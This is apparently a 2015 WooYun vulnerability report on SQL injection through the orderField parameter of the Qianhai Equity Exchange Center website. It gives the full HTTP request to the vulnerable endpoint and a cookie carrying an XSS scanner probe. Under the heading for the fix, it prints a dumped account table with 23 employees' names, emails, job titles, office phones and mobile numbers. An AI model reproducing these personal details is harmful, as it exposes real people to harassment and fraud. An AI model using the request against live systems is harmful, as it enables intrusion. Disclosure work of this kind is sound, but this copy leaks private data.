当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139659

漏洞标题:前海股权交易中心SQL注入(400多名员工信息泄露)

相关厂商:前海股权交易中心

漏洞作者: 深度安全实验室

提交时间:2015-09-08 11:29

修复时间:2015-10-23 11:30

公开时间:2015-10-23 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

前海股权交易中心是根据国务院关于大力发展场外资本市场的统一布局、证监会为了拓展多层次资本市场而特许设立的、地方政府监管的新型交易所。
前海股权交易中心(深圳)有限公司(简称:前海股权交易中心)是广东省区域性股权交易市场的核心组织机构,注册资本5.55亿元。中心在股东结构上引入国内三家顶级证券公司——中信证券、国信证券、安信证券。

详细说明:

前海股权交易中心 主站 如下链接存在SQL注入,其中,orderField参数有问题。

POST /qhee-webapp/action/stock/StockExchangeApplyAction/searchStockExchangeApply?v=1441280469326 HTTP/1.1
Content-Length: 343
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.qhee.com:443/
Cookie: __user_session_id_=c54f1d36-3c1e-4597-919a-a4ff1a85921b; JSESSIONID=9C8CC97EAE458772B4BA1E51E1454C5B; _reg_key_=zqSeigiRND2LfCLinueK; JSESSIONID=9C8CC97EAE458772B4BA1E51E1454C5B; Hm_lvt_d900963e294195855cd1da3cb5ad2f69=1441281341,1441281658,1441281676,1441281698; Hm_lpvt_d900963e294195855cd1da3cb5ad2f69=1441281698; __utmt=1; __utma=232670943.1733654246.1441278543.1441278543.1441278543.1; __utmb=232670943.10.10.1441278543; __utmc=232670943; __utmz=232670943.1441278543.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); __utmv=232670943.|1=%E8%AE%BF%E9%97%AE%E7%94%A8%E6%88%B7%E7%B1%BB%E5%9E%8B=%E6%B8%B8%E5%AE%A2=1; HMACCOUNT=DC282FD335809BD8
Host: www.qhee.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
company_industry=%E5%85%B6%E4%BB%96&exchange_type=&max_exchange_num=&max_exchange_price=&min_exchange_num=&min_exchange_price=&orderField=id&orderType=desc&register_region=&register_region_id=155

0907-11.jpg

漏洞证明:

泄露12个库

0907-12.jpg


以qianhaidb库为例,发现324个表

0907-6.jpg


以qianhaidb库、account表为例,泄露400多名内部员工的敏感信息,包括总经理的,如:姓名、手机、邮箱、部门、职称

0907-5.jpg

0907-4.jpg


其他的表不继续了

修复方案:

Database: qianhaidb
Table: account
[23 entries]
+----------+-------------------+--------+-----------------+--------+---------------+-------------------+--------+-------------+----------+
| field8 | field9 | field2 | field3 | field1 | field6 | field7 | field4 | field5 | field10 |
+----------+-------------------+--------+-----------------+--------+---------------+-------------------+--------+-------------+----------+
| 10100024 | xiemn@qhee.com | 债权业务一部 | 总经理 | 10 | 23823261 | 激活 | 谢萌楠 | 13923765797 | xiemn |
| 10100160 | liaowy@qhee.com | 自媒体运营部 | 自媒体策划专员 | 100 | 0755-88662744 | 激活 | 廖雯彦 | 13620902026 | liaowy |
| 10100163 | sunff@qhee.com | 综合研究所 | 企业金融服务业务总部副总经理 | 101 | 0755-88662833 | 激活 | 孙菲菲 | 13923422825 | sunff |
| 10100166 | chenyx@qhee.com | 自媒体运营部 | 总经理 | 102 | 88662911 | 激活 | 陈奕新 | 18038103188 | chenyx |
| 10100167 | dengzw@qhee.com | 登记结算部 | 交易结算部总经理 | 103 | 88662898 | 激活 | 邓志文 | 13602628262 | dengzw |
| 10100168 | linzh@qhee.com | 信息技术总部 | 综合管理员 | 104 | 0755-88662761 | 激活 | 林志宏 | 13622304672 | linzh |
| 10100169 | yandan@qhee.com | 合规风控部 | 合规风控岗 | 105 | 88662754 | 激活 | 颜丹 | 13243899165 | yandan |
| 10100170 | fengjl@qhee.com | 融资服务部 | 项目经理 | 106 | 0755-23823255 | 激活 | 冯洁连 | 13714624137 | fengjl |
| 10100171 | zouwei@qhee.com | 信息技术总部 | 软件开发师 | 107 | 0755-88662739 | 激活 | 邹维 | 13631686532 | zouwei |
| 10100172 | yangxy@qhee.com | 上市顾问五部 | <blank> | 108 | 0755-23900687 | 激活 | 杨新宇 | 13510654865 | yangxy |
| 10100174 | lanyue@qhee.com | 上市顾问十部 | 上市顾问 | 109 | <blank> | 激活 | 兰月 | 13823184167 | lanyue |
| 10100026 | yinxin@qhee.com | 上市顾问一部 | 上市顾问 | 11 | 0755-88662701 | 激活 | 尹欣 | 13510521026 | yinxin |
| 10100175 | zhangth@qhee.com | 上市顾问九部 | 上市顾问 | 110 | 0755-23835483 | 激活 | 张天海 | 13726223304 | zhangth |
| 10100176 | wangguan@qhee.com | 投行业务部 | 投行业务部项目经理 | 111 | 0755-23895241 | 激活 | 王冠 | 18503061985 | wangguan |
| 10100177 | yaozl@qhee.com | 登记结算部 | 托管岗 | 112 | 0755-88662749 | 激活 | 姚子龄 | 13480801889 | yaozl |
| 10100178 | wangtr@qhee.com | 见证业务部 | 融资管理总部见证业务部渠道经理 | 113 | 0755-88662736 | 激活 | 王天睿 | 13632862337 | wangtr |
| 10100181 | dongzm@qhee.com | 上市顾问四部 | <blank> | 114 | 0755-88888888 | 激活 | 董钊铭 | 15820426848 | dongzm |
| 10100182 | dengzk@qhee.com | 上市顾问四部 | <blank> | 115 | <blank> | 激活 | 邓志铿 | 13923457548 | dengzk |
| 10100183 | xuyq@qhee.com | 人力资源部 | 人力资源部员工关系岗 | 116 | 0755-88662713 | 激活 | 徐祎琪 | 18820954954 | xuyq |
| 10100186 | yutun@qhee.com | 培训咨询部 | 培训咨询总部产品经理 | 117 | <blank> | 激活 | 余暾 | 18607557553 | yutun |
| 10100189 | linxd@qhee.com | 上市顾问三部 | 上市顾问 | 118 | <blank> | 激活 | 林熙丹 | 13828802212 | linxd |
| 10100190 | zhanglg@qhee.com | 债权业务一部 | 产品经理 | 119 | <blank> | 激活 | 张林钢 | 13501597852 | zhanglg |
| 10100027 | huangzt@qhee.com | 信息技术总部 | 高级软件开发师 | 12 | 0755-88662750 | \x07\\?90\x00\x7f | 黄志涛 | 13421399407 | huangzt |
+----------+-------------------+--------+-----------------+--------+---------------+-------------------+--------+-------------+----------+

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)